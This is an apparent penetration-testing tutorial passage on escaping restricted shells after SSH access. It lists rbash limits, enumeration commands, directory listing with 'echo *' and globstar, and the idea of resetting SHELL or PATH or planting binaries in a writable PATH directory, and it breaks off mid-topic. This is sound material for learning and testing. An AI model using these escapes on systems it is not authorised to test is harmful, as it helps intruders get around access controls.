Restricted shells tipically limit the default available capabilities of an standard shell itself, here are some of them
Using the cd command
Setting or unsetting enviroment parameters
Cannot run any command that contains a / char
Output redirection using >, >>, &>, >& and >>
Use exec built-in to replace the current shell with another command
Use enable built-in to enable or disable other shell built-ins
Turning off restricted mode with set +r or set +o restricted
Enumeration
General
Once we establish a connection to the target through SSH and we see that we are dealing with some kind of restrictive shell, we can run the following commands to get an idea of what we are up against
echo $0echo $PATH
This way, we can list the available commands by retrieving the value of environment parameters such as PATH
Enviroment Parameters
We can run the following command to retrieve exported variables in the current restricted shell
envprintenvexport -pdeclare
It would be interesting to be able to modify the value of PATH or SHELL, but they are always -rx( i.e. executable but not writable )
If not, simply set SHELL to any non-restricted shell, such as /bin/bash, or PATH to a directory with exploitable commands
Listing Directory Content
If ls command is not available, we can list the content of the current directory as follows
echo *
Bear in mind that we cannot use / on commands, so we cannot list the content of other directories
However, there is a way to list the content of the current directory and child directories by enabling the globstar bash option using shopt
( shopt -s globstar ; echo ** )
We use a subshell ( ( <COMMAND>) ) to avoid polluting the current enviroment
The initial focus should be on finding binaries that we can run to see if there are known shell escapes associated with them
Listing File Content
Commands such as cat, less, more, vi, nano, head, tail are typically forbidden, which makes it difficult ( nearly impossible 😅 ) to list the content of a given file
Command Substitution + Input Redirection
However, if command substitution is totally or partially enabled for certain commands, we can proceed as follows
Let’s suppose that the PATH parameter has the following value
/home/john/rdir
Then, we would need to find a way to upload or create a file in that directory, so we could run the given binary without specifying its absolute path as it is located within a PATH directory
This only applies if we have write permissions over the directory in question
Bear in mind that we cannot use any type of redirection within restricted shells, so we could check if any of the following methods are possible